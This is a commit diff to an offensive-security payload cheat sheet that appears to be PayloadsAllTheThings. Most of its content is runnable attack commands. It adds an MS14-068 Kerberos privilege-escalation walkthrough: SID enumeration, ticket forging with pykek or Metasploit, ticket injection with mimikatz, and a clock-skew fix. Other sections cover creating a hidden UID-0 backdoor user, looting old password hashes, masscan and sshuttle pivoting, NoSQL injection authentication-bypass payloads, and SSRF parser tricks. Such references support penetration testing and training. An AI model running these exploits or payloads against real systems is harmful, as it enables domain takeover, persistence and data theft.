MS14-068 + /etc/security/opasswd

2024-06-28 18:03:14 +00:00 · 2019-06-29 17:55:13 +02:00 · 2019-06-29 17:55:13 +02:00 · 144b3827ab
commit 144b3827ab
parent 3b85f1b6fc
7 changed files with 108 additions and 17 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -101,23 +101,73 @@

 ### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)

-```bash
-Exploit Python: https://www.exploit-db.com/exploits/35474/
-Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
-Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
+This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.

-git clone https://github.com/bidord/pykek
+```powershell
+# remote
+rpcclient $> lookupnames john.smith
+john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
+
+# loc
+wmic useraccount get name,sid
+Administrator  S-1-5-21-3415849876-833628785-5197346142-500   
+Guest          S-1-5-21-3415849876-833628785-5197346142-501   
+Administrator  S-1-5-21-297520375-2634728305-5197346142-500   
+Guest          S-1-5-21-297520375-2634728305-5197346142-501   
+krbtgt         S-1-5-21-297520375-2634728305-5197346142-502   
+lambda         S-1-5-21-297520375-2634728305-5197346142-1110 
+```
+
+```bash
+Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
+```
+
+Generate a ticket with `metasploit` or `pykek`
+
+```powershell
+Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
+   Name      Current Setting                                Required  Description
+   ----      ---------------                                --------  -----------
+   DOMAIN    LABDOMAIN.LOCAL                                yes       The Domain (upper case) Ex: DEMO.LOCAL
+   PASSWORD  P@ssw0rd                                       yes       The Domain User password
+   RHOSTS    10.10.10.10                                    yes       The target address range or CIDR identifier
+   RPORT     88                                             yes       The target port
+   Timeout   10                                             yes       The TCP timeout to establish connection and read data
+   USER      lambda                                         yes       The Domain User
+   USER_SID  S-1-5-21-297520375-2634728305-5197346142-1106  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
+```
+
+```powershell
+# https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
+git clone https://github.com/SecWiki/windows-kernel-exploits
 python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
 python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
+python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
+```
+
+Then use `mimikatz` to load the ticket.
+
+```powershell
 mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
 ```

+:warning: If the clock is skewed use `clock-skew.nse` script from `nmap`
+
+```powershell
+$ nmap -sV -sC 10.10.10.10
+clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s
+
+$ sudo date -s "14 APR 2015 18:25:16" 
+```
+
+
 ### Open Shares

 ```powershell
-smbmap -H 10.10.10.100    # null session
-smbmap -H 10.10.10.100 -R # recursive listing
-smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
+smbmap -H 10.10.10.10                # null session
+smbmap -H 10.10.10.10 -R             # recursive listing
+smbmap -H 10.10.10.10 -u invaliduser # guest smb session
+smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
 ```

 or 
@ -653,4 +703,5 @@ Most of the time the best passwords to spray are :
 * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
 * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
 * [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
-* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
+* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
+* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)
--- a/Resources/Linux
+++ b/Resources/Linux
@ -29,6 +29,7 @@ ncat --tcp -lvp 4242
 ```powershell
 sudo useradd -ou 0 -g 0 john
 sudo passwd john
+echo "linuxpassword" | passwd --stdin john
 ```

 ## Suid Binary
--- a/Resources/Linux
+++ b/Resources/Linux
@ -15,6 +15,7 @@
 * [Checklist](#checklist)
 * [Looting for passwords](#looting-for-passwords)
    * [Files containing passwords](#files-containing-passwords)
+    * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd)
    * [Last edited files](#last-edited-files)
    * [In memory passwords](#in-memory-passwords)
    * [Find sensitive files](#find-sensitive-files)
@ -133,6 +134,13 @@ grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
 find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
 ```

+### Old passwords in /etc/security/opasswd
+
+The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
+
+:warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes 
+
+
 ### Last edited files

 Files that were edited in the last 10 minutes
@ -614,4 +622,5 @@ https://www.exploit-db.com/exploits/18411
 - [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/)
 - [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html)
 - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
+- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
+* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
--- a/Resources/Network
+++ b/Resources/Network
@ -102,6 +102,9 @@ List Nmap scripts : ls /usr/share/nmap/scripts/
 ```powershell
 masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
 masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
+
+masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
+masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
 ```

 ## Reconnoitre
--- a/Resources/Network
+++ b/Resources/Network
@ -138,7 +138,15 @@ route flush

 ## sshuttle

+Transparent proxy server that works as a poor man's VPN. Forwards over ssh. 
+
+* Doesn't require admin. 
+* Works with Linux and MacOS.
+* Supports DNS tunneling.
+
 ```powershell
+pacman -Sy sshuttle
+apt-get install sshuttle
 sshuttle -vvr user@10.10.10.10 10.1.1.0/24
 sshuttle -vvr username@pivot_host 10.2.2.0/24 
 ```
--- a/Injection/README.md
+++ b/Injection/README.md
@ -1,9 +1,28 @@
 # NoSQL injection

-NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
+> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
+
+## Summary
+
+* [Tools](#tools)
+* [Exploit](exploits)
+  * [Authentication Bypass](#authentication-bypass)
+  * [Extract length information](#extract-length-information)
+  * [Extract data information](#extract-data-information)
+* [Blind NoSQL](#blind-nosql)
+  * [POST with JSON body](#post-with-json-body)
+  * [GET](#get)
+* [MongoDB Payloads](#mongodb-payloads)
+* [References](#references)
+
+## Tools
+
+* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)

 ## Exploit

+### Authentication Bypass
+
 Basic authentication bypass using not equal ($ne) or greater ($gt)

 ```json
@ -17,14 +36,14 @@ in JSON
 {"username": {"$gt":""}, "password": {"$gt":""}}
 ```

-Extract length information
+### Extract length information

 ```json
 username[$ne]=toto&password[$regex]=.{1}
 username[$ne]=toto&password[$regex]=.{3}
 ```

-Extract data information
+### Extract data information

 ```json
 in URL
@ -124,5 +143,5 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi

 * [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
 * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
-* [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists)
-* [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb)
+* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
+* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
--- a/Forgery/README.md
+++ b/Forgery/README.md
@ -217,7 +217,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/
 http://127.1.1.1:80#\@127.2.2.2:80/
 ```

-![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20Injection/Images/WeakParser.jpg)
+![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)


 ## SSRF exploitation via URL Scheme
@ -243,7 +243,7 @@ ssrf.php?url=http://127.0.0.1:80
 ssrf.php?url=http://127.0.0.1:443
 ```

-![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20Injection/Images/SSRF_stream.png)
+![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_stream.png?raw=true)

 The following URL scheme can be used to probe the network